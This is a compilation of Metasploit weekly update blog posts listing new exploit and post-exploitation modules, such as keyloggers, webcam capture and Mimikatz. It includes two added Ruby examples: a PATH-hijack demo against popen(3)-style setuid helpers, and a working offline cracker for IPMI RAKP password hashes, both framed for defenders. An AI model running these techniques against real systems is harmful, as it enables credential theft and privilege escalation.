You may have noticed that we didn't release an update for Metasploit last week. Instead, we were chasing down, fixing, and re-releasing the update to fix a bug in the way the Postgres database is upgraded for Metasploit Community and Metasploit Pro. If you haven't noticed any problems, you're in the majority, and there's no need to reapply anything; the bug only appears to have hit a very few isolated platforms where the end users a) were not on supported platforms and b) had altered their own local database configurations. If you happen to be in this group, simply reinstalling the newly re-released update will get you squared away. Again, this affected a small set of users (I can count them on one hand) and wasn't a security issue or anything, just a configuration conflict.

New Modules

We're shipping a whopping 16 new exploits, including the seven from bperry, eight new auxiliary modules, and one new post module. At a grand total of 25 new modules, it's been a busy week in the People's Glorious Republic of Metasploit. Thanks to all various and sundry contributors for your efforts this week.

Exploit modules
- D-Link DIR-605L Captcha Handling Buffer Overflow by juan vazquez and Craig Heffner exploits OSVDB-86824
- ISPConfig Authenticated Arbitrary PHP Code Execution by Brandon Perry exploits CVE-2013-3629
- Moodle Remote Command Execution by Brandon Perry exploits CVE-2013-3630
- NAS4Free Arbitrary Remote Code Execution by Brandon Perry exploits CVE-2013-3631
- Openbravo ERP XXE Arbitrary File Read by Brandon Perry exploits CVE-2013-3617
- OpenMediaVault Cron Remote Command Execution by Brandon Perry exploits CVE-2013-3632
- vTigerCRM v5.4.0/v5.3.0 Authenticated Remote Code Execution by Brandon Perry exploits CVE-2013-3591
- Zabbix Authenticated Remote Command Execution by Brandon Perry exploits CVE-2013-3628
- Mac OS X Persistent Payload Installer by Marcin 'Icewall' Noga and joev
- Open Flash Chart v2 Arbitrary File Upload by Braeden Thomas, Brendan Coles, Gjoko Krstic, and Halim Cruzito exploits CVE-2009-4140
- WebTester 5.x Command Execution by Brendan Coles
- EMC Replication Manager Command Execution by Davy Douhine and Unknown exploits ZDI-11-061
- HP Intelligent Management Center BIMS UploadServlet Directory Traversal by juan vazquez and rgod exploits ZDI-13-238
- Persistent Payload in Windows Volume Shadow Copy by Jedediah Rodriguez
- Windows Management Instrumentation (WMI) Remote Command Execution by Ben Campbell exploits CVE-1999-0504
- Interactive Graphical SCADA System Remote Command Injection by Luigi Auriemma and MC exploits CVE-2011-1566

Auxiliary and post modules
- HP Intelligent Management SOM Account Creation by juan vazquez and rgod exploits ZDI-13-240
- SMB File Delete Utility by mubix
- SMB File Download Utility by mubix
- Node.js HTTP Pipelining Denial of Service by Marek Majkowski, joev, and titanous exploits CVE-2013-4450
- HP Intelligent Management BIMS DownloadServlet Directory Traversal by juan vazquez and rgod exploits ZDI-13-239
- HP Intelligent Management SOM FileDownloadServlet Arbitrary Download by juan vazquez and rgod exploits ZDI-13-242
- Jenkins Enumeration by Jeff McCutchan
- Radware AppDirector Bruteforce Login Utility by Karn Ganeshen
- Windows Single Sign On Credential Collector (Mimikatz) by Ben Campbell

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration. For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Weekly Update: Meterpreter Updates, VMWare, the OSX spycam, Retabbing, and more!

Meterpreter Updates

This is a big week for Meterpreter. For starters, we've landed a new Meterpreter Python payload. Yes, yes, I know, you thought that Metasploit was all Ruby all the time, but this and the Python payloads for bind shells from Spencer McIntyre should help out on advancing the state of Meterpreter by leaps and bounds. Despite Metasploit's massive Ruby footprint, most security developers know Python well enough to scratch their own penetration testing itches in it, so I'm looking forward to a lot of active development here. Plus, since Python is part of the Linux Standard Base, you're quite likely to find it on pretty much any normal Linux distribution, so it should see a lot of use against non-Microsoft targets.

In other Meterpreter news, we have a new contributor entering the fray on the Windows 32-bit and 64-bit side by the name of OJ Reeves. His entire mission in life (at least, for now) is to make it much easier for normal humans to compile, test, and extend Meterpreter for the Windows platform. If you've been down the hacking-on-Meterpreter path in the past, you know what kind of pit vipers can be lurking in that code, so expect to see some massive improvements there in the next couple of weeks.

VMware Setuid Exploit (CVE-2013-1662)

This week also sees a new local privilege escalation exploit targeting Linux, the VMWare Setuid vmware-mount Unsafe popen(3) module (aka vmware_mount.rb). Discovered by Google's Tavis Ormandy and implemented by our own James "Egypt" Lee, this exploits a setuid vulnerability that takes advantage of a VMware installation to sneak a root shell: vmware-mount is setuid root and shells out via popen(3), which runs its command string through /bin/sh -c under the invoking user's environment, and an inherited environment is exactly the kind of untrusted input a setuid binary must not lean on. Egypt discusses the Metasploit implementation at length in this blog post, so I encourage you to check it out. Note that this module does not let attackers escape from a VMware guest to the host operating system; it's specifically useful for taking advantage of a VMware installation to elevate privileges on the host OS itself.

More OSX Hijinks

The other set of modules I want to highlight is a trio from Rapid7's Joe Vennix: the OSX Capture Userspace Keylogger module, the OSX Manage Record Microphone module, and the OSX Manage Webcam module. As you can probably guess from their titles, these are all post-exploit modules penetration testers can exercise to extend their eyes and ears into the site under test. These kinds of Hollywood-hacker style post-exploit tricks are exactly the kind of thing that's great to demo to clients to help explain the true risk associated with Apple desktop / laptop bugs, since they are, by their nature, pretty dramatic and fun to use.

Tab Assassin

Finally, this week we're going to be pulling the trigger on the great retabbing of Metasploit in order to bring us up to the normal, regular coding standards common to Ruby projects. While I have every expectation this change will be traumatic for long-time contributors, we're faithfully documenting everything along the way under the shortlink http://r-7.co/MSF-TABS. If you have patches and pull requests that are suddenly thrown into a conflicted state this week, the retabbing from @Tabassassin is probably the root cause. But never fear: just read the fine material regarding the change, and you should be back into an unconflicted state in two shakes.

New Modules

We've got eleven new modules this week. Including the ones mentioned above, we've got another three ZDI-derived exploits (which are always informative), a really nicely commented implementation of the MS13-059 exploit for Internet Explorer, and a pair of Windows post modules that can be used to further extend control over the victim machine. As always, thanks everyone for your contributions!

Exploit modules
- VMWare Setuid vmware-mount Unsafe popen(3) by egyp7 and Tavis Ormandy exploits CVE-2013-1662
- SPIP connect Parameter PHP Injection by Arnaud Pachot, Davy Douhine, and Frederic Cikala exploits OSVDB-83543
- HP LoadRunner lrFileIOService ActiveX Remote Code Execution by juan vazquez and rgod exploits ZDI-13-182
- HP LoadRunner lrFileIOService ActiveX WriteFileString Remote Code Execution by juan vazquez and Brian Gorenc exploits ZDI-13-207
- Firefox XMLSerializer Use After Free by juan vazquez and regenrecht exploits ZDI-13-006
- MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free by sinn3r and corelanc0d3r exploits MS13-059

Auxiliary and post modules
- OSX Capture Userspace Keylogger by joev
- OSX Manage Record Microphone by joev
- OSX Manage Webcam by joev
- Windows Gather Prefetch File Information by TJ Glad
- Windows Manage Set Port Forwarding With PortProxy by Borja Merino

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration. For additional details on what's changed and what's current, please see Brandont's most excellent release notes.
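Back to the vmware-mount module for a moment. The following is an added illustration of the bug class it exploits, a privileged helper that shells out with popen(3) and trusts the caller's environment; it is not code from the Metasploit module, from Egypt's writeup, or from VMware, and it uses `uname` as a stand-in for whatever helper command the real binary ran (an assumption for the demo, not a claim about vmware-mount). It plants a fake `uname` in an attacker-controlled directory, prepends that directory to PATH, and compares a popen(3)-style invocation (`/bin/sh -c`, inherited environment) with a hardened one (absolute path, no shell, environment replaced wholesale). Without root the demo cannot show the privilege jump itself, only the resolution mistake that makes it possible.

```ruby
require 'tmpdir'
require 'fileutils'

# Plant a fake "uname" in an attacker-controlled directory. Any privileged
# program that resolves "uname" through an inherited PATH will run this instead.
def plant_fake_binary(dir, name)
  path = File.join(dir, name)
  File.write(path, "#!/bin/sh\necho PWNED\n")
  File.chmod(0755, path)
  path
end

# Mirrors popen(3): the command string is handed to /bin/sh -c and the child
# inherits the caller's environment, PATH included. This is the unsafe pattern.
def run_like_popen(cmd)
  IO.popen(['/bin/sh', '-c', cmd], &:read).to_s.strip
end

# Hardened variant for a setuid helper: absolute path, no shell, and the
# environment is discarded (unsetenv_others) in favour of a fixed, trusted PATH
# so anything the helper itself spawns cannot be hijacked either.
def run_hardened(abs_path, *args)
  raise ArgumentError, "absolute path required: #{abs_path}" unless abs_path.start_with?('/')
  env = { 'PATH' => '/usr/bin:/bin' }
  IO.popen(env, [abs_path, *args], unsetenv_others: true, &:read).to_s.strip
end

# Demo harness (constructed scenario): temporarily prepend an attacker
# directory to PATH, then resolve "uname" both ways. Returns both outputs.
def demo_path_hijack
  Dir.mktmpdir('hijack') do |dir|
    plant_fake_binary(dir, 'uname')
    saved = ENV['PATH']
    begin
      ENV['PATH'] = "#{dir}:#{saved}"
      unsafe = run_like_popen('uname')
      real_uname = ['/bin/uname', '/usr/bin/uname'].find { |p| File.executable?(p) }
      hardened = run_hardened(real_uname)
      { unsafe: unsafe, hardened: hardened }
    ensure
      ENV['PATH'] = saved
    end
  end
end

if $PROGRAM_NAME == __FILE__
  r = demo_path_hijack
  puts "popen(3)-style: #{r[:unsafe]}"   # attacker's script ran
  puts "hardened:       #{r[:hardened]}" # the real uname ran
end
```

The `unsafe` result is whatever the planted script prints; the `hardened` result is the real kernel name, regardless of PATH. When you review a setuid binary, grep for popen(3), system(3) and execvp-family calls that take a relative command name; each one is a candidate for exactly this.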

Weekly Update: Apple OSX Privilege Escalation

Sudo password bypass on OSX

This week's update includes a nifty local exploit for OSX, the sudo bug described in CVE-2013-1775. We don't have nearly enough of these Apple desktop exploits, and it's always useful to disabuse the Apple-based cool-kids web app developer crowd of the notion that their computing platform of choice is bulletproof.

Joe Vennix, the principal author of this module, is, in fact, of that very same Apple-based developer crowd, and usually busies himself cranking out features for Metasploit Pro. But he's been hanging out with the wrong crowd (the exploit devs here at Rapid7), so over the weekend he put together this implementation of Todd C. Miller's and Marco Schoepl's sudo time-changing bug. Turns out, OSX allows regular users to adjust the system time. Since sudo decides whether to re-prompt for a password by comparing the clock against a per-user timestamp file, winding the clock back lets a compromised user account reuse that cached authentication and escalate to root without knowing the user's password, assuming the victim has used sudo at least once before (so the timestamp file exists), which is often the case for local OSX users.

Pretty neat trick. For more details on why this works, see the oss-sec post from early this year. Thanks Joe!

Housekeeping!

So, I don't know if you noticed, but over the last couple of weeks we've managed to hack and slash our way through a great big pile of Metasploit Framework bugs. First off, we just came off a Rapid7 push to shore up the continuous integration test infrastructure; you can peek in on that at Travis-CI, and see that we juiced up the number of automated tests that run with every build from about 980 to (as of now) 1,437. Pretty much everyone here in the Rapid7 Metasploit hideout helped out with that, and so today we have a really solid foundation for you, the community contributor, to start putting together useful regression testing on your favorite chunk of Metasploit.

In addition, our own Wei @sinn3r Chen took up the cause of cleaning up a bunch of existing modules to conform to our current code standards, opening and resolving about 50 tickets on his own.

The moral of this story is that contributing to Metasploit Framework can be more than what most people think of, namely writing exploit modules that exercise vulnerabilities. While that kind of work is probably the most fun and glamorous part of Metasploit, there are a lot of areas that could use automated testing, cleanup, and focused bug hunting. So, if you're more of a general Ruby hacker and not so much a security-focused hacker, that's totally okay by me. Feel free to jump in and fire off pull requests in our direction that provide repeatable testing for core Metasploit functionality, and you'll have a direct impact on improving the state of the art of open source security.

New Modules

We've got three new exploits this week. A little less than usual, but man, did we clean up a bunch of older modules: twenty-four in all were touched for this release.

- Mac OS X Sudo Password Bypass by juan vazquez, Todd C. Miller, and joev exploits CVE-2013-1775
- Graphite Web Unsafe Pickle Handling by Charlie Eriksen exploits CVE-2013-5093
- Oracle Endeca Server Remote Command Execution by juan vazquez and rgod exploits ZDI-13-190

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration. For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Weekly Update: Cooperative Disclosure and Assessing Joomla

Cooperative Disclosure

I'm in attendance this year at Rapid7's UNITED Security Summit, and the conversations I'm finding myself in tend to revolve around vulnerability disclosure. While Metasploit doesn't traffic in zero-day vulnerabilities every day, it happens often enough that we have a disclosure policy that we stick to when we get hold of newly uncovered vulnerabilities.

What's not talked about in that disclosure policy is the Metasploit exploit dev community's willingness to help you, the unaffiliated researcher, build out Metasploit modules that exercise your awesome new bug. While the usual procedure is to put together your module and send us a Pull Request, if you're dealing in undisclosed vulns, you probably don't want to spill the beans before your disclosure is public and the vendor has had a chance to react.

In those cases, a little more private tutelage might be the thing for you. This week, Juan Vazquez did just that with contributor Charlie Eriksen and his shiny new Graphite vulnerability. It's pretty easy to put together a private git repo, work out whatever bugs, cleanup, and style tips are necessary for your module to hit prime time, and then land it in the main Metasploit distribution once the disclosure parts are done.

Expressing a new vulnerability as a Metasploit module is more than mere fame and fortune for the exploit dev. Public Metasploit modules are just about the best way today to bring public visibility to your bug. This, in turn, has a nearly magical effect on getting patches rolled out or other mitigations in place in record time, which makes the Internet as a whole a stronger, more resilient, and more useful network.

So, if you're sitting on some undisclosed vulnerabilities and you're not super sure how to go about turning them into generally useful Metasploit modules, just ask! Both the Rapid7-employed exploit devs and the larger Metasploit community are always happy to help out with some mano a mano module writing, and we're pretty good at keeping new, undisclosed vulns off of Twitter (at least, for a little while).

Joomla Bug in the Wild

Speaking of patching, late last week Metasploit exploit developer Juan Vazquez wrote up the latest Joomla bug as part of putting together a module to exploit it. I won't rehash it all here, but if you're of the Joomla persuasion, this will hopefully be another example of a public Metasploit module spurring along your own scanning and patching process.

If you run an enterprise IT shop, you know that Joomla is one of those technologies that has a tendency to pop up in your environment, even if it's not on your explicit whitelist of approved technologies. It's pretty easy to set up and use, so you might be surprised to find it humming along in your environment as people (with all the best intentions!) fire up an instance to run their local knowledge base or internal blog or whatever. And, since those folks aren't running sanctioned and blessed IT-approved software, who knows if they've been keeping up on their patches. So, along with this latest module, it might be a good time to break out the old Joomla Version scanner module to tally up what's running.

New Modules

We've got ten new modules this week, including the new Joomla module mentioned above. Enjoy!

Exploit modules
- Java storeImageArray() Invalid Array Indexing Vulnerability by sinn3r, juan vazquez, and Unknown exploits CVE-2013-2465
- Joomla Media Manager File Upload Vulnerability by juan vazquez and Jens Hinrichsen exploits OSVDB-95933
- Chasys Draw IES Buffer Overflow by juan vazquez, Christopher Gabriel, Javier 'soez', and Longinos Recuero Bustos exploits CVE-2013-3928
- Cogent DataHub HTTP Server Buffer Overflow by juan vazquez and rgod exploits ZDI-13-178
- Intrasrv 1.0 Buffer Overflow by PsychoSpy and xis_one exploits OSVDB-94097
- MiniWeb (Build 300) Arbitrary File Upload by AkaStep and Brendan Coles exploits OSVDB-92200
- Ultra Mini HTTPD Stack Buffer Overflow by PsychoSpy and superkojiman exploits CVE-2013-5019

Auxiliary and post modules
- Nexpose XXE Arbitrary File Read by Bojan Zdrnja, Brandon Perry, and Drazen Popovic
- Cisco Ironport Bruteforce Login Utility by Karn Ganeshen
- OSX Password Prompt Spoof by Joff Thyer and joev

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration. For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Weekly Update: Metasploit Pro on Chromebook, Galaxy Tab, and a Batch of New ZDI Exploits

Vegas Time!

Like the rest of the information security industry, we're buttoning down for the annual pilgrimage to Vegas next week. This means collecting up all our new community-sourced swag, finishing up training and presentation material, figuring out what the heck to do with our phones to avoid casual ownage, and test driving our new Chromebook builds of Metasploit Pro. They're pretty sweet. The latest update for ARM-arch Kali should run without a problem on an SD card-installed Chromebook alternate OS.

This just in: Metasploit Pro is known to successfully pop shells from a Galaxy Tab as well, as demonstrated by Mati "muts" Aharoni of Offensive Security. While the technical work is impressive by itself, the decals that Lance @lsanchez-r7 Sanchez cooked up pretty much steal the show. Yeah, we're pretty pleased with these. (:

As far as confirmed meatspace appearances from the Rapid7 Metasploit contingent: nex and rep are presenting at BlackHat about Cuckoo Sandbox, todb will be speaking at BSidesLV Common Ground with Thomas d'Otreppe about the vices and virtues of open source security, and of course Egypt will be delivering in-depth Metasploit training at BlackHat.

So, be careful out there, stay safe (infosec-wise, if not health-wise), swing by our BlackHat Booth #517 for some awesome Metasploit 10-year anniversary T-shirts, and let's see what we can do to advance the state of the art of open source security for another year or ten.

New Modules

We've got seven new modules with this week's update. As you can see below, this week is pretty heavy on ZDI-reversed exploits. We've got ZDI-11-352 for HP Managed Printing Administration, a couple of vectors for ZDI-13-110 for Apple QuickTime, and ZDI-13-147 for VMware vCenter Chargeback Manager.

- Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment by Ramon de C Valle exploits CVE-2013-2113
- D-Link Devices UPnP SOAP Command Execution by juan vazquez and Michael Messner exploits OSVDB-94924
- Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection by Ramon de C Valle exploits CVE-2013-2121
- Apple Quicktime 7 Invalid Atom Length Buffer Overflow by sinn3r, Jason Kratzer, Paul Bates, and Tom Gallagher exploits ZDI-13-110
- Apple Quicktime 7 Invalid Atom Length Buffer Overflow by sinn3r, Jason Kratzer, Paul Bates, and Tom Gallagher exploits ZDI-13-110
- HP Managed Printing Administration jobAcct Remote Command Execution by juan vazquez and Andrea Micalizzi exploits ZDI-11-352
- VMware vCenter Chargeback Manager ImageUploadServlet Arbitrary File Upload by juan vazquez and Andrea Micalizzi exploits ZDI-13-147

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration. For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Metasploit Update: Those Sneaky IPMI Devices

IPMI, in my network?

This week's update features a set of tools for auditing your IPMI infrastructure. "Phew, I'm glad I'm not one of those suckers," you might be thinking to yourself. Well, the thing about IPMI (aka the Intelligent Platform Management Interface) is that it's just a skootch more esoteric than most protocols, and even experienced server administrators may not be aware of it. Do you use server hardware from IBM, Dell, or HP? Have you ever had to use IBM's Remote Supervisor adapters, Dell's DRAC cards, or HP's iLO kit? If so, congrats! Chances are extremely good that you're running IPMI, and so you should really take a second to look at HD's and Dan Farmer's IPMI material.

In addition to the IPMI modules, we also have a bonus utility shipping this week, expertly snuck into the tools/ directory. Turns out, most (all?) offline password crackers don't do a great job on the hashes IPMI 2.0 hands out: during the RAKP handshake the BMC returns an HMAC-SHA1 keyed with the user's password over session data the client itself supplied, so anyone who can speak RAKP to the BMC walks away with an offline-crackable value for any username they can guess. This was problematic for IPMI auditing, so HD whipped up hmac_sha1_crack.rb. In fact, if you weren't aware of the tools/ directory, take a look. There's a lot in there that can help not only with exploit development, but with all sorts of specialized security tasks you might not normally think of using Metasploit for.

Back to IPMI. Obviously, this vector is most relevant for the insider threat; sensible network management means that these IPMI devices won't be talking to your waiting room, your call center, or your parking lot over WiFi. If you've spent any time at all in the penetration testing world, though, you know it's really easy to screw those boundaries up, so it's worth it to audit your networks, all of them, for protocol endpoints that sneak through unexpectedly. And hey, there are some BOFHs out there who will go to great lengths to route traffic over VPN (or the Internet) so they can remotely manage their machines from home or their phone. I've known a few of those guys. I might have even been one of those guys in a past life. (:

Redmine refresh

Also this week, we've done some housekeeping on our Redmine bug tracker. While none of the updates should be really noticeable by you, my beloved public bug filers and feature requestors, please do pipe up on the #metasploit Freenode IRC channel or mailing lists if you see something that doesn't seem right to you. Thanks to Kernelsmith for first noticing and reporting the problem with the Redmine wiki, and HD for untangling the somewhat labyrinthine dependencies that have grown around this server over time.

Oh, and incidentally, avoid using the Redmine wiki; virtually everything of import has been moved to either the Metasploit Community (you're soaking in it!) or, for developer docs, GitHub. We need to start putting in helpful redirects from the old wiki for the stragglers and identifying what's left to convert. If you'd like to help, feel free to volunteer; we can always use more motivated hands!

New modules

We've got six new modules this week, including the IPMI material. Go to town on your network before someone else does.

- IPMI 2.0 RAKP Cipher Zero Authentication Bypass Scanner by hdm and Dan Farmer exploits OSVDB-93040
- IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval by hdm and Dan Farmer
- IPMI Information Discovery by hdm and Dan Farmer
- InstantCMS 1.6 Remote PHP Code Execution by juan vazquez, AkaStep, and Ricardo Jorge Borges de Almeida exploits BID-60816
- ABBS Audio Media Player .LST Buffer Overflow by Julian Ahrens and modpr0be exploits OSVDB-75096
- ERS Viewer 2013 ERS File Handling Buffer Overflow by juan vazquez and James Fitts exploits CVE-2013-3482

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration. For additional details on what's changed and what's current, please see Brandont's most excellent release notes.
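To make the RAKP point above concrete, here is an added example of the offline attack the hash retrieval module sets up and hmac_sha1_crack.rb finishes. It is not the code of either tool, and its sample exchange is constructed, not a capture. The HMAC input layout (SIDm, SIDc, Rm, Rc, GUIDc, ROLEm, ULENm, UNAMEm) follows the IPMI 2.0 specification's RAKP message 2; the session IDs, nonces, GUID, role byte and the short default-password list are placeholders chosen for the demo.

```ruby
require 'openssl'

# Data covered by the RAKP message 2 authentication code, per the IPMI 2.0 spec:
# SIDm || SIDc || Rm || Rc || GUIDc || ROLEm || ULENm || UNAMEm.
# Session IDs are 4 bytes little-endian, both nonces and the GUID are 16 bytes,
# the role is one byte, and the username is preceded by its one-byte length.
def rakp2_hmac_input(sid_m:, sid_c:, rand_m:, rand_c:, guid_c:, role_m:, username:)
  raise ArgumentError, 'rand_m must be 16 bytes' unless rand_m.bytesize == 16
  raise ArgumentError, 'rand_c must be 16 bytes' unless rand_c.bytesize == 16
  raise ArgumentError, 'guid_c must be 16 bytes' unless guid_c.bytesize == 16
  [sid_m, sid_c].pack('VV') + rand_m.b + rand_c.b + guid_c.b +
    [role_m, username.bytesize].pack('CC') + username.b
end

# What the BMC computes and sends back in RAKP message 2: HMAC-SHA1 keyed with
# the user's password. The client chose SIDm and Rm and sees every other field,
# so the returned 20 bytes are crackable offline with no further contact.
def rakp2_hmac(password, hmac_input)
  OpenSSL::HMAC.digest('sha1', password, hmac_input)
end

# Offline dictionary attack: recompute the HMAC for each candidate password
# and compare against the value the BMC returned. Returns the match or nil.
def crack_rakp2(hmac_input, target_hex, candidates)
  target = [target_hex].pack('H*')
  candidates.find { |pw| rakp2_hmac(pw, hmac_input) == target }
end

# Constructed sample (not a real capture): the fields a client knows after
# sending RAKP message 1 for user "ADMIN" and receiving message 2.
SAMPLE_INPUT = rakp2_hmac_input(
  sid_m: 0xa4a3a2a0,          # client session ID, attacker-chosen
  sid_c: 0x02000000,          # BMC session ID
  rand_m: ("\x01" * 16).b,    # client nonce, attacker-chosen
  rand_c: ("\x02" * 16).b,    # BMC nonce
  guid_c: ("\x03" * 16).b,    # BMC GUID (also leaked by the handshake)
  role_m: 0x14,               # role byte as sent in message 1 (administrator)
  username: 'ADMIN'
)

# Tiny wordlist of placeholder vendor defaults; feed a real list in practice.
DEFAULT_PASSWORDS = %w[admin ADMIN calvin password root changeme].freeze

if $PROGRAM_NAME == __FILE__
  # Simulate a BMC whose ADMIN password is "calvin" and recover it.
  leaked = rakp2_hmac('calvin', SAMPLE_INPUT).unpack1('H*')
  puts "RAKP2 HMAC-SHA1: #{leaked}"
  puts "recovered: #{crack_rakp2(SAMPLE_INPUT, leaked, DEFAULT_PASSWORDS).inspect}"
end
```

The detail worth remembering as a defender is that this is not a flaw in any one vendor's firmware but in how RAKP is specified: the only mitigations are strong, unique BMC passwords and keeping the management network off anything untrusted, which is why the post above keeps coming back to network boundaries.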

Metasploit Update: Weaponizing Local Exploits

Weaponizing Local Exploits

This week's update features an exploit for Tavis @taviso Ormandy's vulnerability in the EPATHOBJ::pprFlattenRec function, which lives in win32k.sys on pretty much any Windows machine you're likely to run into. A whole lot of people threw in on this module to make this exploit reliable in Metasploit: Tavis and progmboy wrote the original C exploit, new contributor @Keebie4e ported it to a Metasploit module, and then a whole bunch of people pitched in (and continue to do so) to make it more and more stable. You can follow along at home by scrolling through PR #2036. I don't usually point at specific pull requests, but this one offers a pretty neat glimpse into how vulns become modules around here. If you're interested in exploit development, these are the kinds of discussions that are invaluable to follow.

Oh, and incidentally, there's no patch yet for this particular issue, so it's effectively 0-day. While it's "only" a privilege escalation, penetration testers pretty routinely need some way to elevate from a local user privilege level to local SYSTEM (and from there, it's but a hop, skip, and jump away from Domain Administrator, thanks to the miracle of Mimikatz credential dumping).

Further, consider the power of an exploit like this when combined with, say, the latest Java exploit from Adam Gowdiak and Matthias Kaiser: the Java bug gets code running as the browsing user, and the win32k.sys bug takes it from there to SYSTEM. What this means is that any malicious web server out on the Internet has a pretty straight shot at a whole lot of internal Windows networks.

That's pretty bad. Many, many domain administrators are now at the mercy of the next (secret, unpublished) client-side exploit. Hopefully, with the publication of this vulnerability, defenders (and Microsoft) will come up with a decent solution sooner rather than later. In the meantime, it seems like offensive security has the upper hand. Now might be a good time to check your defense in depth strategies...

New Modules

We've got five new modules this week, including the two referenced above. What can I say, the security community tends to get a little quiet in early July, as everyone finalizes their BSides / BlackHat / DefCon material.

- SMTP Open Relay Detection by Campbell Murray
- Java Applet ProviderSkeleton Insecure Invoke Method by Adam Gowdiak and Matthias Kaiser exploits CVE-2013-2460
- Carberp Web Panel C2 Backdoor Remote PHP Code Execution by Steven K, bwall (Brian Wallace), and connection (Luis Santana)
- Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation by sinn3r, juan vazquez, egyp7, Keebie4e, Meatballs, Tavis Ormandy, and progmboy exploits CVE-2013-3660
- Windows Manage Trojanize Support Account by salcho

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration. For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Weekly Update: Smaller is Better

In this week's episode, the role of Tod Beardsley will be played by egypt.

Smaller is better

Perhaps the most prominent addition to the framework this week is not an addition at all, but rather a deletion. We've been working toward a slimmer, more manageable source tree for a while now, and as part of that effort, we recently removed a pile of old-and-busted unit tests. This update goes a bit further, moving source code for some compiled payloads into separate repositories. Metasploit's version of Javapayload (which includes Java and Android Meterpreter) can now be found at rapid7/metasploit-javapayload, the native C meterpreter lives in rapid7/meterpreter, and the excellent packet manipulation library, PacketFu, has been pulled out of the tree in favor of the standalone gem. As is so often the case when anything involving Java arises, thanks again go to mihi for his help with a consolidated Java build environment. By my calculations, the framework repository is now somewhere in the neighborhood of 45MB lighter.

Less is more

Another thing that has gotten much smaller is our pull queue, thanks to the tireless efforts of the lovely wvu. Having someone working full-time on ticket husbandry has made many things go more smoothly, and as a result the number of open pull requests and unresolved issues has been steadily falling. Which, of course, means that now is a great time to submit that patch you've been meaning to write!

New Modules

This week brings 6 new modules:

- Sun Java Web Start Double Quote Injection by Rh0 exploits CVE-2012-1533
- MS13-037 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow by juan vazquez, 4B5F5F4B, and Nicolas Joly exploits MS13-037
- Monkey HTTPD Header Parsing Denial of Service (DoS) by Doug Prostko exploits CVE-2013-3843
- InfoVista VistaPortal Application Bruteforce Login Utility by Karn Ganeshen
- RFCode Reader Web Interface Login / Bruteforce Utility by Karn Ganeshen
- SAPRouter Port Scanner by Bruno Morisson and nmonkee

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration. For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Weekly Update: Adventures in Unstable, DoS'ing UPnP for Good, and Secret AWK Shells

Stable is for Suckers!

Today on the Freenode IRC channel #metasploit, a user was asking about our old SVN repository for "unstable" Metasploit modules. He was lamenting its loss, since we recently shut down our SVN services (described in this blog post on May 22, 2013).

Fear not, danger-seekers! "Unstable" does live on in the form of a GitHub branch. You can check it out at https://github.com/rapid7/metasploit-framework/tree/unstable, and take a look at the unstable-modules directory. Most of the modules in there ran into some kind of trouble in testing or are too unreliable to package up and ship in Metasploit proper. But who knows? Opening up the unstable-modules directory is like buying a mystery box at auction, so you might find a lost treasure, or a mass of half-rotten comicbooks. If you're interested in that sort of thing, just be sure to check the history of the module in question to understand what all happened with it. This is usually pretty easy by reading the commit history and contacting the original author.

Another source for interesting-but-unshipped modules is Rob @mubix Fuller's Q Repository. Oftentimes, things that don't quite fit with the Metasploit main distro will end up here. I am totally on board with someone other than Rapid7 maintaining alternate streams of free, open source, unencumbered Metasploit modules. After all, why should we have all the fun spreading open source cheer around the Internet?

If you're after these modules for reasons beyond mere intellectual curiosity -- like, you actually want to use them -- all you need to do is create a directory structure like $HOME/.msf4/modules/auxiliary/test (or exploits/test, post/test, etc), and drop them in. You can change the name "test" to whatever you like, but you must declare what sort of module it is in the path. When you run msfconsole, those modules will be scooped up, and ready to use.
